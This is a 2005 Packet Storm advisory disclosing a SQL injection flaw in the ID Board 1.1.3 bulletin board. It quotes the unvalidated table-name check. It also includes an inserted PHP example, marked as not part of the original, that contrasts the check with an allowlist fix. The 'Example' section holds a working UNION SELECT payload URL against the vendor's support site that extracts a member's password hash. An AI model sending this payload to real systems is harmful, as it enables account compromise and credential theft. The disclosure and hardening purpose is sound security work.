idboard113SQL.txt

2005-07-12T00:00:00
ID PACKETSTORM:38572
Type packetstorm
Reporter defa
Modified 2005-07-12T00:00:00

Description

                                        
                                            `============================================================  
Title: ID Board 1.1.3 SQL Injection Vulnerability  
Vulnerability Discovery: me, myself and I  
Date: 09/07/2005  
Severity: Remote users can fetch MD5 Passwd Hash.  
Affected version: 1.1.3 free (only one tested)  
Vendor: http://www.id-team.com/  
============================================================  
  
============================================================  
  
* Summary *  
  
ID Board is a little bulletin board system. It is offered in three  
versions; I could only test the free one. The board is commonly used on  
German-speaking websites.  
  
-------------------------------------------------------------  
  
* Problem Description *  
-----------------------  
  
The bug resides in sql.cls.php - the tbl_suff variable isn't checked.  
  
Vulnerable Code:  
  
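// $from is not validated here: the test only decides whether the  
// table prefix/suffix placeholders are added around it.  
if (!ereg("LEFT JOIN", $from) && !ereg(",", $from) && !ereg("AS", $from))  
    $from = "[tbl_prev]".$from."[tbl_suff]";  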
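
The check quoted above only decides whether to add the table prefix and suffix; neither branch validates $from. The following is an added example, not code from this advisory or from ID Board: it reproduces that check beside an allowlist-based replacement. The function names, the table list and the assumption that request input reaches $from unchanged are hypothetical.

```php
<?php
// Added example; function names and the table list are hypothetical.

// Constructed list of logical table names the application may query.
const KNOWN_TABLES = ['members', 'posts', 'topics'];

// The quoted check, ported from ereg() (removed in PHP 7) to strpos():
// true means $from would be treated as a plain table name and wrapped.
function legacy_would_wrap(string $from): bool
{
    return strpos($from, 'LEFT JOIN') === false
        && strpos($from, ',') === false
        && strpos($from, 'AS') === false;   // case-sensitive, like ereg()
}

// Hardened variant: wrap only an exact, known identifier.
function strict_wrap(string $from): string
{
    if (!preg_match('/\A[A-Za-z_][A-Za-z0-9_]*\z/', $from)
        || !in_array($from, KNOWN_TABLES, true)) {
        throw new InvalidArgumentException('rejected table name');
    }
    return '[tbl_prev]' . $from . '[tbl_suff]';
}

// Constructed inputs; the last is the decoded "f" value from the example URL.
$samples = [
    'members',
    'members AS m',
    '1 WHERE 0=1 UNION SELECT mem_pw as post_topic_name FROM members WHERE mem_id=1/*',
];

foreach ($samples as $from) {
    // In the legacy code, "left as-is" still reaches the query unvalidated.
    $legacy = legacy_would_wrap($from) ? 'wrapped' : 'left as-is';
    try {
        $strict = strict_wrap($from);
    } catch (InvalidArgumentException $e) {
        $strict = $e->getMessage();
    }
    printf("%-20.20s legacy: %-10s strict: %s\n", $from, $legacy, $strict);
}
```

Only the first sample passes the strict variant; the legacy check wraps the third sample because its alias keyword is lowercase and it contains no comma or LEFT JOIN.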
  
  
* Example * (Account required)  
------------------------------  
  
http://support.id-team.com/index.php?site=warn&f=1%20WHERE%200=1%   
20UNION%20SELECT%20mem_pw%20as%20post_topic_name%20FROM%20members%   
20WHERE%20mem_id=1/*&0&warn=0  
  
-------------------------------------------------------------  
  
* Fix *  
  
Contact the Vendor.  
  
-------------------------------------------------------------  
  
* References *  
  
This mail.  
-------------------------------------------------------------  
  
* Credits *  
  
no credit.  
-------------------------------------------------------------  
  
regards  
defa  
  
--  
Don't eat yellow snow!  
  
`